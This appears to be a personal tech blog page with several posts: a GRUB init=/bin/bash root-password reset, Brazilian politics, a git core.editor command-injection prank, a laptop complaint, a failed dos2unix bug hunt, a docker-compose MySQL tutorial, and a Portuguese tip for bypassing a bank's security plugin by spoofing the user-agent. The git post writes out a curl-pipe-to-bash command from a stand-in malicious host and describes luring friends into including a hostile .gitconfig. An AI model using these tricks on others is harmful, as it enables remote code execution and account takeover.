Feeds:
Posts
Comments

These days I did a presentation in a local event (Poticon 2018). It was about some silly security pranks and I was surprised when I asked about disk encryption and/or grub password and only one person hands up. The majority didn’t use any measure to protect their machines. You may asking why I got so surprised or concerned and the answer is simple: init=/bin/bash into your grub config plus mount -n -o remount,rw /; passwd. Yep, if you got it you know exactly what I meaning. A machine without any protect is completely vulnerable to someone change your root password and worst than that. If you do a fresh install and select you user to be into the adm group or sudo group the password you pick will work for you user do a sudo and become root, but if someone change your root password by falling into /bin/bash from grub you’ll probably never realize that your root passwd changed unless you ssh as root to your machine and, of course, be blocked to get into it.

Advertisements

Some of you already knows that I’m from Brazil, I thought a bit before to post it, because that is a tech blog not about politicians or whatever, but I feel that I need to make people know what is happening here. I understand that the majority of the people that live in another countries like to live your life in the peace of you own issues, but since we are a global env I always thought that it is strongly necessary to at least try to understand what is happening around.
Last Sunday we had our elections, and despite all the warnings coming from a lot of specialists, Harvard being one of them, the majority of Brazilians elected someone that has a huge profile as fascists. Some people may ask that it happened in another countries and everything is ok so far. Well, Brazil used to be a peaceful country, despite all the security issues the people was in general friendly with each other, no hateful things happening a lot and so on…but these days things are quite complicated, unfortunately. Gay people, black people, the poorest ones are being discriminated as never. And that is really sad. Brazil is a multicultural country with people from all around the world in its bases and that is what make us a so different and unique country. Last night 29 of September 2018 a very sad episode happened. During a hallowen party in a private school in my home town (Natal) a mother dressed her own son as a slave. Not only that, she also posted his pic on the instagram, and after being very criticized on the webs, deleted her profile but also posted [1]. Translated: “don’t read books about brazilian history. They says that slavery of black people existed in Brazil, but that is a lie. And don’t try to argue with anyone about that, because they will treat you like shit, a racist person…”. Just to clarify, slavery really happened in Brasil and it’s a very sad part of our history you can find some info around the webs, like this one [2].
That is only a little piece of what is happening here, beyond that we had a bunch of bigots saying broadly that gay people need to die and woman need to be raped. The authorities here are quite sleeping and practically endorsing this behaviors when they don’t do nothing!
Well, I just would like to show you what is happening here, and how that is sad for our recent democracy. :(.
You can see the article about the mother and the slave son here [3]. Sorry for that!

[1]
IMG-20181029-WA0057
[2] https://en.wikipedia.org/wiki/Slavery_in_Brazil
[3] https://g1.globo.com/rn/rio-grande-do-norte/noticia/2018/10/29/mae-fantasia-filho-de-escravo-para-festa-de-halloween-em-escola-de-natal-vamos-abrasileirar-esse-negocio.ghtml

Once more I thought I had found a vul in an open source, but again I was anxious , hehe. This time it was git software. What I saw was that it’s possible to “inject” code into [core]  editor = . You can do a simple test yourself. Just edit your .git/config adding some line like:

[core]
editor = ls -la /tmp/

When you run: git commit it will call your editor and in that time it will execute any command line you put in editor variable. It include a curl -s malicious.com/malicious.sh | bash – && vim. But as it was clarified to me by Peff (Jeff King) on git list, it’s not a vul, and why? The explanation is quite simple, git clone don’t get .git/conf from the other side. It creates a new one, so there is no way someone exploited that, unless he gets access to your machine. And basically that is the way you can prank someone that uses git :).

[edited/added]
If you aren’t a good person at all, you can also push a repository with a .gitconfig file on it and a editor = some malicious command here, and gracefully ask to your friends git clone it and naively add the .gitconfig file to git local config: git config –local include.path ../.gitconfig. (But as I said you are $%%@ if you do that).
For the sake of information, git community is fulled aware of that already, as you can see here [1]. So, don’t be concerned, because the git engines guys/girls behind the scenes are already making you safe :)! – Thanks git community!

[1] https://public-inbox.org/git/87zi6eakkt.fsf@evledraar.gmail.com/

It was one of my greats regret. I by it with 32gb memory and think “owwwwwoo it will be working for at least 5/10 years”. First thing that break was the fan, it starts to make some noise…and now see by the pictures yourself. I can avoid to say that I’m very piss off very angry, very frustrated…see the pics and don’t want to say anything more.

 

IMG_20180804_103318044IMG_20180804_103325021IMG_20180804_103330415

 

 

 

 

 

Don’t buy it. Does not worth at all!!!

Life as Security Engineer is more funny when you put some time looking through codes and trying to find vulnerabilities and fix it, indeed!
That was one of my first attempts that I’ll tell you and how I failed miserably :). Well sometimes s-happens. But in the second round I could find a memory leak \o/. It wasn’t a expose sensitive info or execute arbitrary code but at least something was found.
But lets start in the begin…

There are plenty of vulnerabilities around and thanks to Intel more and more every day (I’m kidding Intel <3). So, in order to starting in this kind of adventure I grab some books, and start to read about how are the more often vuls, what kind of techniques are used to fix or find it and so on. In all those reads one thing is repeated constantly “take always a look in points where the user entry some info”. Yeah, users + vulnerabilities can really blow up things in a software.  As a nice code to look I thought in one that use sometimes to time: dos2unix package. It’s a nice tool and useful one. As my first attempt was to look in code were users can input something and so far so good everything looks fine but one variable grabbed my attention localedir. It’s a buffer of 1024 size. Its content is filled by some internal functions with the value of DOS2UNIX_LOCALEDIR env variable. So I thought what if I set this with a large size and try to overflow it? Here was my first failed because the code check this:  if (strlen(ptr) < sizeof(localedir)), where ptr = getenv(“DOS2UNIX_LOCALEDIR”). It was so disappointed for me :(. So I saw that this variable is used to be printed in stdout and I thought “hm, what if I try to put some bash code there  and see what happens” – That was my second fail :(. If you do something like: export DOS2UNIX_LOCALEDIR=”`tail ../../../etc/passwd`” by example you will end up with the content of tail into the env var. At first I thought I was executing the command into it, but it wasn’t the case 😦 I didn’t pay attention in the acute accent and what it does (execute the command and return its ouput). It was a shame to report that so happy it was a vul issue. But ok, we learn with mistakes…following in the code I just decided to run valgrind on it and voila! I got a memory leak. Well, not the ideal one, but it was a leak. What happens is that in the code a variable called pFlag is allocated but not freed and that is a memory leak, but unfortunately (again) this happen in program/process that runs just on time, what means that in the end of it the OS request the memory and who cares about that leak. :(. Well, lesson learned.

I hate docker! Yes, I hate a bit. Why? Just because I tried a lot to do a simple application that uses a mysql everything internal into a docker and I failed, terrible! I did researches a lot about how to set it and also failed terrible. Every piece of tutorial I found was about using a docker image container and linking it to another container running the application or even some bullshit about docker mysql image and web applications. NO! That wasn’t what I looking for at all. After did more research I found docker-compose, but yet nothing about put my application in a single image/docker together with mysql. I don’t care how it’s for some people that like things separated, but I also think in docker to do things that are easy to delivery and that was why I tried that. But let’s forget the rage and focus in the tutorial itself that I hope will help some people that are/were looking for the same as me.

Step 1: Install docker and docker-compose.

I choose for docker-ce and you can follow the steps to download/install here. For docker-compose I just did a sudo apt-get install docker-compose (I’m using ubuntu 16.04 LTS).

Step 2: You probably will see some error while trying to run docker. So, before you see that add you $USER to the docker group. Do this:

  1. sudo usermod -aG docker $USER 
  2. newgrp docker

Now you can use docker without issues.

Step 3: Write your docker-compose.yaml file: In my case I wanted to use mysql and everything into the same docker container image. When I say everything I mean my mysql databases, my mysqlserver with my databases, my application itself running internally to the container accessing the database and so on…

database:
  image: mysql
  container_name: application.v1
  volumes:
    - ./somefolder/some_script_to_install_your_app.sh:/tmp/install_your_app.sh
    - ./data_volume:/opt/data_volume/
  ports:
    - "3306:3306"
  environment:
   MYSQL_DATABASE: "your_data_base_name"
   MYSQL_USER: "some_user"
   MYSQL_PASSWORD: "some_user's_password"
   MYSQL_ROOT_PASSWORD: "root_passwd"

Using the docker-compose.yaml above you’ll be able to create a mysql image/container. Cool! But what about my application? The way I did it can be a little hack or not right but in few words, who cares! In essence a mysql image is a debian imagem with mysql set in it. So you can just install things into it and put your application to into that container/image as you want. In order to do that I just add some scripts in volume to install my application and internally the application access mysql through localhost host, simple! YEAH! The only thing is that you need to run first a docker-compose up (in the same directory were you .yaml file is)   to put your mysql server to run and in separated run your application as: docker exec application.v1 application (supposing your install it in /bin). If you don’t like or don’t want do type docker exec … you can just create a shell/bash wrap around the command that 1) starts the mysql server and 2) runs your application \o/. And finally you have an application running beautifully with a internal docker container mysql.  For the inconvenience of run a docker-compose up and so your application you can just hack this and run a: docker-compose stop && docker-compose up &> /dev && docker exec application.v1. It’s not pretty as you wish probably, but it works as a charm.
I hope that I have help you somehow because the internet is fully of garbage that don’t explain nothing right of with all details. I’m sure I not put all details here, but I’ willing to help in the comments session or even when I edit this post. For now, just try as an exercise put a script into your docker-compose.yaml that e.g:  install git and git clone your app and compile it and install into /bin. See if it runs, if it access mysql internally and that is all!

AVISO: Caso você opte por realizar os passos descritos aqui saiba que você está por sua conta. O guardião do banco X ou  keylogger/malware do banco X (como é apelidado carinhosamente) serve para dar segurança nas suas transações via browser. (Ao menos é o que dizem – Talvez se você achar em algum lugar o site ou o canal com a cia de Software, que codou ele você consiga uma melhor informação).

Faz algumas semanas que tenho enfrentado a dor de cabeça que é realizar transações online via o banco X e não consigo porque o guardião simplesmente parou de funcionar. Não adianta tentar reinstalar, nem numa VM eu consegui fazer ele funcionar novamente (Eu uso ubuntu 16.04 LTS). Há erros com o certutil na hora da instalação e nada se consegue tentando instalá-lo. O que parece uma instalação normal termina com uma tela dizendo que o guardião não está instalado e dores de cabeça se você precisa pagar algo ou realizar alguma transação online.

Mas eis que hoje me passaram esta dica. Existem addons que modificam o user-agent do seu browser e ao fazê-lo o guardião é jogado de lado e você consegue realizar as transações tranquilamente (Lembre-se do disclaim acima, você está por sua conta em risco). Mas se o seu browser não possui nenhum addon que faça isso você pode adicionar o novo user-agent na mão.
Aqui eu usei o Firefox 59.01 (Quantun).
Passos:

  1. Na área de por a URL digite: about:config
  2. Agore pesquise por: general.useragent.override
  3. Provavelmente o seu browser não tem essa flag, então basta adicioná-la. Clique com o botão direito no corpo da página: new->string. Adicione o nome da variável e logo em seguida o valor dela: Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36
  4. Se tudo deu certo agora você pode tentar acessar o site do banco X e verificar que ele não reclama mais sobre a instalação do guardião.

Boa sorte e lembre-se, por sua conta em risco.

 

Referências:

https://www.howtogeek.com/113439/how-to-change-your-browsers-user-agent-without-installing-any-extensions/

https://udger.com/resources/ua-list/browser-detail?browser=Chrome